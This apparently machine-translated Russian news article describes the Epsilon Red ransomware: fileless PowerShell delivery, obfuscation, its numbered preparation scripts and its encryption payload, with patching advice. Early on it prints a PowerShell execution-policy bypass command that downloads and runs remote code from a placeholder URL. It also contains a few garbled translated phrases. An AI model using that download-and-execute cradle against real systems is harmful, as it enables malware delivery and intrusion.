Вы уже пропатчили свои серверы ?
Новая угроза -вымогатель под названием Epsilon Red нацелена на неисправленные серверы Microsoft в корпоративных центрах обработки данных. Названный в честь малоизвестного злодея из комиксов Marvel, Epsilon Red недавно был обнаружен компанией по кибербезопасности Sophos. С момента своего обнаружения программа-вымогатель атаковала многие организации по всему миру.
Бесфайловый вирус-вымогатель «прячется» в PowerShell
Бесфайловые программы-вымогатели — это разновидность вредоносного ПО, которое запускается в комплекте с законным программным обеспечением. Бесфайловое вредоносное ПО на базе PowerShell использует способность PowerShell загружаться непосредственно в память устройства. Эта функция помогает защитить вредоносное ПО в сценариях PowerShell от обнаружения.
В типичном сценарии при выполнении сценария его сначала необходимо записать на диск устройства. Это позволяет решениям по обеспечению безопасности конечных точек обнаруживать сценарии. Поскольку PowerShell исключен из стандартных процессов выполнения сценариев, он может обходить безопасность конечных точек. Кроме того, использование параметра обхода в сценарии PowerShell позволяет злоумышленнику обойти ограничения сетевых сценариев.
Пример параметра обхода PowerShell:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Как видите, разработать параметры обхода PowerShell относительно просто.
В ответ Microsoft выпустила патч для устранения уязвимости удаленного выполнения вредоносного ПО, связанной с PowerShell. Однако патчи эффективны ровно настолько, насколько они используются. Многие организации смягчили стандарты установки исправлений, что сделало их среду уязвимой для атак. Цель Epsilon Red — воспользоваться этим уровнем уязвимости.
Двойная полезность Epsilon Red
Поскольку Epsilon Red наиболее эффективен против необновленных серверов Microsoft, вредоносное ПО можно использовать в качестве вымогателя и инструмента идентификации. Независимо от того, успешен ли Epsilon в среде, злоумышленники получают более полное представление о возможностях безопасности своей цели.
Если Epsilon удалось получить доступ к Microsoft Exchange Server, это означает, что организация не соблюдает общие рекомендации по обеспечению безопасности с помощью исправлений. Для злоумышленника это показывает, насколько легко Epsilon может скомпрометировать остальную среду цели.
Epsilon Red использует затемнение, чтобы скрыть свою полезную нагрузку. Обфускация делает код нечитаемым и используется во вредоносных программах PowerShell, чтобы избежать высокой читаемости сценариев PowerShell. При обфускации используются командлеты -псевдонимы PowerShell , которые затрудняют антивирусному программному обеспечению обнаружение вредоносных сценариев в журналах PowerShell.
Epsilon Red наиболее эффективен против непропатченных серверов Microsoft.
Однако запутанные сценарии PowerShell все равно можно идентифицировать. Распространенным признаком предстоящей атаки PowerShell Script является создание объекта WebClient. Злоумышленник создаст объект WebClient в коде PowerShell, чтобы установить внешнее соединение с удаленным URL-адресом , содержащим вредоносный код.
Если организация подвергается атаке, вероятность того, что она имеет достаточные меры безопасности для обнаружения запутанных сценариев PowerShell, очень мала. И наоборот, если Epsilon Red не удастся проникнуть на сервер, это укажет злоумышленнику на то, что сеть цели может быстро расшифровать вредоносное ПО PowerShell, что сделает атаку менее ценной и более ценной.
Кибер-вторжение Эпсилон Ред
Функционал Epsilon Red очень прост. Программное обеспечение использует серию скриптов Powershell для проникновения на серверы. Эти сценарии PowerShell пронумерованы от 1.ps1 до 12.ps1. Целью каждого сценария PowerShell является подготовка целевого сервера для окончательной полезной нагрузки.
Все сценарии PowerShell в Epsilon Red имеют свое предназначение. Один из сценариев PowerShell в Epsilon Red предназначен для разрешения правил брандмауэра целевой сети. Еще одно программное обеспечение из этой серии, предназначенное для удаления антивирусного программного обеспечения цели .
Как вы могли догадаться, эти сценарии работают синхронно, чтобы гарантировать, что после доставки полезной нагрузки цель не сможет быстро остановить ее продвижение.
Передача полезной нагрузки
Как только сценарии PowerShell от Epsilon освобождают место для своей окончательной полезной нагрузки, они распространяются как расширение Red.exe . При входе на сервер Red.exe сканирует файлы сервера и создает список путей к каталогам для каждого обнаруженного файла. После создания списка дочерние процессы создаются из основного файла вредоносной программы для каждого пути к каталогу в списке. Затем каждый подфайл программы-вымогателя шифрует путь к каталогу из файла списка.
После того, как все пути к папкам в списке Epson будут зашифрованы, останется файл .txt для информирования цели и запроса злоумышленника. Кроме того, все доступные сетевые узлы, подключенные к скомпрометированному серверу, будут скомпрометированы, и вероятность проникновения вредоносного ПО в сеть может возрасти.
Кто стоит за Эпсилон Ред?
Личности нападавших за «Эпсилон Ред» до сих пор неизвестны.
Личности нападавших, стоящих за Эпсилон Ред, до сих пор неизвестны. Однако некоторые улики указывают на происхождение нападавших. Первая подсказка — это название вредоносного ПО. Эпсилон Ред — злодей из «Людей Икс» русского происхождения.
Вторая подсказка заключается в записке о выкупе в файле .txt, который оставил код. Оно похоже на записку, оставленную бандой вымогателей REvil. Однако такое сходство не указывает на то, что нападавшие были членами этой банды. REvil осуществляет операцию RaaS (программа-вымогатель как услуга), в рамках которой филиалы платят REvil за доступ к ее вредоносному ПО.
Защитите себя от Эпсилон Ред
На данный момент Epsilon Red успешно проникает на неисправленные серверы. Это означает, что одна из лучших мер защиты от Epsilon Red и аналогичных вредоносных программ-вымогателей — обеспечить правильное управление вашей средой. Кроме того, наличие решения безопасности, которое может быстро расшифровывать сценарии PowerShell, будет полезным дополнением к вашей среде.
Вы видите уведомление об активации Windows 10 в правом углу экрана? В этой статье вы узнаете, как удалить уведомление о запросе на авторские права в Windows 10.
Недавно Microsoft выпустила последнее накопительное обновление для пользователей ПК с Windows 10 под названием Build 14393.222. Это обновление, выпущенное для Windows 10, в основном исправляет ошибки на основе отзывов пользователей и повышает производительность операционной системы.
Есть ли в вашей локальной сети компьютеры, которым требуется внешний доступ? Использование хоста-бастиона в качестве привратника для вашей сети может быть хорошим решением.
Если вы предпочитаете использовать старую классическую клавиатуру, например IBM Model M, на которой нет физической клавиши Windows, есть простой способ добавить ее, позаимствовав клавишу, которую вы не часто используете.
Иногда вам может потребоваться удалить все старые журналы событий сразу. В этом руководстве Quantrimang.com покажет вам 3 способа быстрого удаления всех журналов событий в средстве просмотра событий Windows 10.
Во многих предыдущих статьях мы упоминали, что сохранять анонимность в Интернете чрезвычайно важно. Частная информация утекает каждый год, что делает безопасность в Интернете все более необходимой. По этой же причине нам следует использовать виртуальные IP-адреса. Ниже мы узнаем о методах создания поддельных IP-адресов!
WindowTop — это инструмент, который позволяет затемнять все окна приложений и программ, запущенных на компьютерах с Windows 10. Или вы можете использовать интерфейс с темным фоном в Windows.
Языковая панель в Windows 8 — это миниатюрная языковая панель инструментов, предназначенная для автоматического отображения на экране рабочего стола. Однако многие люди хотят скрыть эту языковую панель на панели задач.
Беспроводное подключение сегодня является необходимостью, и поэтому безопасность беспроводной сети необходима для обеспечения безопасности вашей внутренней сети.
Увеличение скорости Интернета имеет важное значение для оптимизации сетевого подключения. Вы можете получить оптимальные впечатления от развлечений и работы, используя компьютеры, телевизоры с возможностью подключения к Интернету, игровые приставки и т. д.
